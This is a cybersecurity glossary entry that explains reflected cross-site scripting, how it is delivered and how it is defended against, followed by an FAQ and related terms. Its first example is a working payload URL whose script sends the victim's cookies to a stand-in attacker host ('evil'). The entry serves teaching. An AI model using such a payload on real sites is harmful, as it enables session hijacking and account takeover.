Reflected XSS
What is Reflected XSS?
Reflected XSSA non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser.
Reflected XSS (also called non-persistent or Type-1) happens when a web application takes data from an HTTP request, typically a URL query parameter or form field, and echoes it back in the response without proper output encoding. The attack requires the victim to click a crafted link, so it is usually delivered through phishing, malvertising, or chat messages. Successful exploitation can steal session cookies, perform actions on behalf of the user, or chain into a full account takeover. Defenses include context-aware HTML encoding, a strict Content Security Policy, the X-XSS-Protection header (legacy), and frameworks that auto-escape templated output.
● Examples
- 01
https://example.com/search?q=<script>document.location='https://evil/?c='+document.cookie</script>
- 02
An error page that reflects an unsanitized 'message' query parameter directly into the DOM.
● Frequently asked questions
What is Reflected XSS?
A non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser. It belongs to the Attacks & Threats category of cybersecurity.
What does Reflected XSS mean?
A non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser.
How does Reflected XSS work?
Reflected XSS (also called non-persistent or Type-1) happens when a web application takes data from an HTTP request, typically a URL query parameter or form field, and echoes it back in the response without proper output encoding. The attack requires the victim to click a crafted link, so it is usually delivered through phishing, malvertising, or chat messages. Successful exploitation can steal session cookies, perform actions on behalf of the user, or chain into a full account takeover. Defenses include context-aware HTML encoding, a strict Content Security Policy, the X-XSS-Protection header (legacy), and frameworks that auto-escape templated output.
How do you defend against Reflected XSS?
Defences for Reflected XSS typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Reflected XSS?
Common alternative names include: Non-persistent XSS, Type-1 XSS.
● Related terms
- attacks№ 240
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- attacks№ 1107
Stored XSS
A persistent cross-site scripting flaw where attacker-supplied script is saved on the server and later executed in every visitor's browser.
- attacks№ 347
DOM-Based XSS
An XSS variant where the injection and execution happen entirely in the browser as client-side JavaScript writes untrusted data into a sink without sanitization.
- appsec№ 214
Content Security Policy (CSP)
An HTTP response header that tells the browser which sources of scripts, styles, frames and other content are allowed, limiting the impact of XSS and data-injection attacks.
- attacks№ 821
Phishing
A social-engineering attack in which an attacker impersonates a trusted party to trick a victim into revealing credentials, transferring money, or running malware.
- appsec№ 773
Output Encoding
Transforming untrusted data into a form that is safe for a specific output context — HTML, JavaScript, URL, SQL, shell — so it cannot break out and execute as code.
● See also
- № 104Blind XSS